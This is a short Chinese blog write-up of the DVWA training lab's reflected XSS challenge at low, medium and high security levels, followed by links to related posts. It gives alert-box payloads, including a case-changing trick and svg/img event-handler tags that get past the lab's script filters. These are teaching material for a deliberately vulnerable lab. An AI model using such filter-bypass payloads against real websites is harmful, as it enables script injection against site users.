【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦

假客套2024-11-06 13:19

一、低级low

简单拿捏

<script>alert(123)</script>

二、中级middle

源码过滤了script但是没有过滤大小写,改成大写S

<Script>alert(123)</script>

三、高级high

比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行

<svg onload=alert(123)>

<img src=x onerror=alert(123)>
相关推荐
假客套2 小时前
【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦
网络安全·xss·web渗透·dvwa靶场·dvwa xss靶场
阿宝分享技术2 小时前
从xss到任意文件读取
前端·xss
kuber09097 小时前
雷池社区版新版本功能防绕过人机验证解析
网络安全
溯Sec8 小时前
搜索引擎之shodan(一):初始化及安装
网络·安全·web安全·搜索引擎·网络安全·系统安全·安全架构
0DayHP15 小时前
HTB:PermX[WriteUP]
网络安全
亿林数据20 小时前
网络安全等级保护制度详解:一文掌握核心要点
网络安全·等保测评
duliduli121920 小时前
盘点 2024 十大免费/开源 WAF
网络安全
热门推荐
01Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO02【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总03组基轨迹建模 GBTM的介绍与实现(Stata 或 R)04制冷毛细管的计算方法介绍05(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明06【经验分享】Ubuntu22.04安装微信(linux官方版)07支付宝短视频平台创作分成激励项目08【Java】Ruoyi-Vue-Plus 整合 文件分片上传至 minio、阿里云、七牛云等OSS-【后端篇】09RAG 实践- Ollama+RagFlow 部署本地知识库10AI 绘画Stable Diffusion 研究(十四)SD 图生图+剪映制作人物说话视频